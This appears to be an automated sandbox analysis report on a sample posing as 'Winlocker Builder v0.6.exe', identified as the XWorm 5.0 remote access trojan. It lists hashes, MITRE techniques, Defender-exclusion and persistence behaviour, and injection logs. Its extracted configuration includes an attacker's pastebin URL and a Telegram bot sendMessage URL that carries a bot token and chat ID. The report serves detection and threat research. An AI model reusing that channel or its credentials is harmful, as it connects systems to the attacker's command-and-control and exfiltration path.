xworm | fa7bd4b4c4f621aa00c0007f4af4363904f6e4a2b5ca545e4b38e2de23cb473f

Analysis

max time kernel
21s
max time network
34s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
25-01-2025 01:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Winlocker Builder v0.6.exe
Size

1.3MB
MD5

a00721b4615c9ab1c166f08baf5233e3
SHA1

96ab6fee83413faaf6c3e77b52f2684dee0cb76d
SHA256

fa7bd4b4c4f621aa00c0007f4af4363904f6e4a2b5ca545e4b38e2de23cb473f
SHA512

eedf0da3b1f08c5ca46402e6600ea20c2f35310080bdd8c86413e5db5f17f81dca69c79378859a46647b5cbd3684a1d2332733bd03705721d0d0d0056caaf001
SSDEEP

24576:FMbXvsRLDInc+3WNyc4aKZQ6VvDrVq3EXcWdFVtV6d/PH:70c+Gr1YBrNXcEFVf6pPH

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

vTtlhGPfn0ebMPsq

Attributes

Install_directory
%Public%
install_file
explorer.exe
pastebin_url
https://pastebin.com/raw/4zaiEtZS
telegram
https://api.telegram.org/bot8175192176:AAHZuZ0-rHS66YSwsvh8-gQjbZYSbY3IyXo/sendMessage?chat_id=7537927256

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2968-71-0x0000000004C00000-0x0000000004C12000-memory.dmp	family_xworm

Modifies visiblity of hidden/system files in Explorer 2 TTPs 6 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2496	powershell.exe
3632	powershell.exe
4220	powershell.exe
388	powershell.exe
3076	powershell.exe
1912	powershell.exe
3452	powershell.exe
4796	powershell.exe
2176	powershell.exe
1124	powershell.exe
4632	powershell.exe
3632	powershell.exe
8	powershell.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	Winlocker Builder v0.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	Winlocker Builder v0.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	Winlocker Builder v0.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	Winlocker Builder v0.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	Winlocker Builder v0.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	Winlocker Builder v0.6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation	Winlocker Builder v0.6.exe

Loads dropped DLL 24 IoCs

pid	Process
2200	rundll32.exe
2200	rundll32.exe
2200	rundll32.exe
3996	rundll32.exe
3996	rundll32.exe
3996	rundll32.exe
2968	explorer.exe
2968	explorer.exe
2968	explorer.exe
1580	rundll32.exe
1580	rundll32.exe
1580	rundll32.exe
4616	rundll32.exe
4616	rundll32.exe
4616	rundll32.exe
1168	rundll32.exe
1168	rundll32.exe
1168	rundll32.exe
3120	rundll32.exe
3120	rundll32.exe
3120	rundll32.exe
3704	rundll32.exe
3704	rundll32.exe
3704	rundll32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
30	pastebin.com
32	pastebin.com
39	pastebin.com
46	pastebin.com
48	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Drops file in System32 directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-1#immutable1 = "Credential Manager"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-100#immutable1 = "Mouse"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\systemcpl.dll,-1#immutable1 = "System"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\systemcpl.dll,-2#immutable1 = "View information about your computer, and change settings for hardware, performance, and remote connections."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-5#immutable1 = "View and update your device hardware settings and driver software."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-6#immutable1 = "Color Management"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\appwiz.cpl,-159#immutable1 = "Programs and Features"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sud.dll,-10#immutable1 = "Choose which programs you want Windows to use for activities like web browsing, editing photos, sending e-mail, and playing music."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-102#immutable1 = "Keyboard"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-1#immutable1 = "BitLocker Drive Encryption"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-300#immutable1 = "Sound"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-2000#immutable1 = "View and manage devices, printers, and print jobs"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-2#immutable1 = "Conserve energy or maximize performance by choosing how your computer manages power."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Defender Firewall"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\netcenter.dll,-1#immutable1 = "Network and Sharing Center"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-2#immutable1 = "Protect your PC using BitLocker Drive Encryption."	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-4#immutable1 = "Device Manager"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-601#immutable1 = "Indexing Options"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-52#immutable1 = "Set the date, time, and time zone for your computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-2#immutable1 = "Keep a history of your files"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-3#immutable1 = "Region"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-51#immutable1 = "Date and Time"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-1#immutable1 = "Phone and Modem"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-2#immutable1 = "Customize settings for the display of languages, numbers, times, and dates."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-103#immutable1 = "Customize your keyboard settings, such as the cursor blink rate and the character repeat rate."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-1#immutable1 = "Troubleshooting"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-52#immutable1 = "File History"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\netcenter.dll,-2#immutable1 = "Check network status, change network settings and set preferences for sharing files and printers."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4312#immutable1 = "Internet Options"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-15#immutable1 = "Troubleshoot and fix common computer problems."	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-1#immutable1 = "Power Options"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\autoplay.dll,-1#immutable1 = "AutoPlay"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-101#immutable1 = "Recovery"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4313#immutable1 = "Configure your Internet display and connection settings."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-1000#immutable1 = "Devices and Printers"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-7#immutable1 = "Change advanced color management settings for displays, scanners, and printers."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-101#immutable1 = "Backup and Restore (Windows 7)"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15301#immutable1 = "Manage your RemoteApp and Desktop Connections"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12123#immutable1 = "Set firewall security options to help protect your computer from hackers and malicious software."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-2#immutable1 = "Change user account settings and passwords for people who share this computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-100#immutable1 = "Recover copies of your files backed up in Windows 7"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-2#immutable1 = "Manage your Windows credentials."	explorer.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3924	schtasks.exe
656	schtasks.exe
3572	schtasks.exe
1560	schtasks.exe
4080	schtasks.exe
1840	schtasks.exe
4980	schtasks.exe
4244	schtasks.exe
5112	schtasks.exe
4980	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2968	explorer.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
2200	rundll32.exe
1124	powershell.exe
1124	powershell.exe
3996	rundll32.exe
3632	powershell.exe
3632	powershell.exe
2968	explorer.exe
1580	rundll32.exe
4220	powershell.exe
4220	powershell.exe
4220	powershell.exe
4616	rundll32.exe
4616	rundll32.exe
4632	powershell.exe
4632	powershell.exe
4632	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
388	powershell.exe
388	powershell.exe
388	powershell.exe
8	powershell.exe
8	powershell.exe
8	powershell.exe
3076	powershell.exe
3076	powershell.exe
3076	powershell.exe
1168	rundll32.exe
1168	rundll32.exe
1912	powershell.exe
1912	powershell.exe
1912	powershell.exe
3120	rundll32.exe
3120	rundll32.exe
3276	taskmgr.exe
3276	taskmgr.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
3276	taskmgr.exe
3276	taskmgr.exe
3704	rundll32.exe
3704	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1796	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	2200	rundll32.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeIncreaseQuotaPrivilege	1124	powershell.exe
Token: SeSecurityPrivilege	1124	powershell.exe
Token: SeTakeOwnershipPrivilege	1124	powershell.exe
Token: SeLoadDriverPrivilege	1124	powershell.exe
Token: SeSystemProfilePrivilege	1124	powershell.exe
Token: SeSystemtimePrivilege	1124	powershell.exe
Token: SeProfSingleProcessPrivilege	1124	powershell.exe
Token: SeIncBasePriorityPrivilege	1124	powershell.exe
Token: SeCreatePagefilePrivilege	1124	powershell.exe
Token: SeBackupPrivilege	1124	powershell.exe
Token: SeRestorePrivilege	1124	powershell.exe
Token: SeShutdownPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeSystemEnvironmentPrivilege	1124	powershell.exe
Token: SeRemoteShutdownPrivilege	1124	powershell.exe
Token: SeUndockPrivilege	1124	powershell.exe
Token: SeManageVolumePrivilege	1124	powershell.exe
Token: 33	1124	powershell.exe
Token: 34	1124	powershell.exe
Token: 35	1124	powershell.exe
Token: 36	1124	powershell.exe
Token: SeDebugPrivilege	8	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	3996	rundll32.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeIncreaseQuotaPrivilege	3632	powershell.exe
Token: SeSecurityPrivilege	3632	powershell.exe
Token: SeTakeOwnershipPrivilege	3632	powershell.exe
Token: SeLoadDriverPrivilege	3632	powershell.exe
Token: SeSystemProfilePrivilege	3632	powershell.exe
Token: SeSystemtimePrivilege	3632	powershell.exe
Token: SeProfSingleProcessPrivilege	3632	powershell.exe
Token: SeIncBasePriorityPrivilege	3632	powershell.exe
Token: SeCreatePagefilePrivilege	3632	powershell.exe
Token: SeBackupPrivilege	3632	powershell.exe
Token: SeRestorePrivilege	3632	powershell.exe
Token: SeShutdownPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeSystemEnvironmentPrivilege	3632	powershell.exe
Token: SeRemoteShutdownPrivilege	3632	powershell.exe
Token: SeUndockPrivilege	3632	powershell.exe
Token: SeManageVolumePrivilege	3632	powershell.exe
Token: 33	3632	powershell.exe
Token: 34	3632	powershell.exe
Token: 35	3632	powershell.exe
Token: 36	3632	powershell.exe
Token: SeShutdownPrivilege	2968	explorer.exe
Token: SeCreatePagefilePrivilege	2968	explorer.exe
Token: SeDebugPrivilege	2868	Winlocker Builder v0.6.exe
Token: SeDebugPrivilege	2968	explorer.exe
Token: SeDebugPrivilege	1580	rundll32.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeIncreaseQuotaPrivilege	4220	powershell.exe
Token: SeSecurityPrivilege	4220	powershell.exe
Token: SeTakeOwnershipPrivilege	4220	powershell.exe
Token: SeLoadDriverPrivilege	4220	powershell.exe
Token: SeSystemProfilePrivilege	4220	powershell.exe
Token: SeSystemtimePrivilege	4220	powershell.exe
Token: SeProfSingleProcessPrivilege	4220	powershell.exe
Token: SeIncBasePriorityPrivilege	4220	powershell.exe
Token: SeCreatePagefilePrivilege	4220	powershell.exe
Token: SeBackupPrivilege	4220	powershell.exe

Suspicious use of FindShellTrayWindow 17 IoCs

pid	Process
2968	explorer.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe
3276	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1796 wrote to memory of 796	1796	Winlocker Builder v0.6.exe	90
PID 1796 wrote to memory of 796	1796	Winlocker Builder v0.6.exe	90
PID 1796 wrote to memory of 8	1796	Winlocker Builder v0.6.exe	91
PID 1796 wrote to memory of 8	1796	Winlocker Builder v0.6.exe	91
PID 796 wrote to memory of 2200	796	control.exe	92
PID 796 wrote to memory of 2200	796	control.exe	92
PID 2200 wrote to memory of 1124	2200	rundll32.exe	93
PID 2200 wrote to memory of 1124	2200	rundll32.exe	93
PID 2200 wrote to memory of 3572	2200	rundll32.exe	96
PID 2200 wrote to memory of 3572	2200	rundll32.exe	96
PID 8 wrote to memory of 3196	8	Winlocker Builder v0.6.exe	98
PID 8 wrote to memory of 3196	8	Winlocker Builder v0.6.exe	98
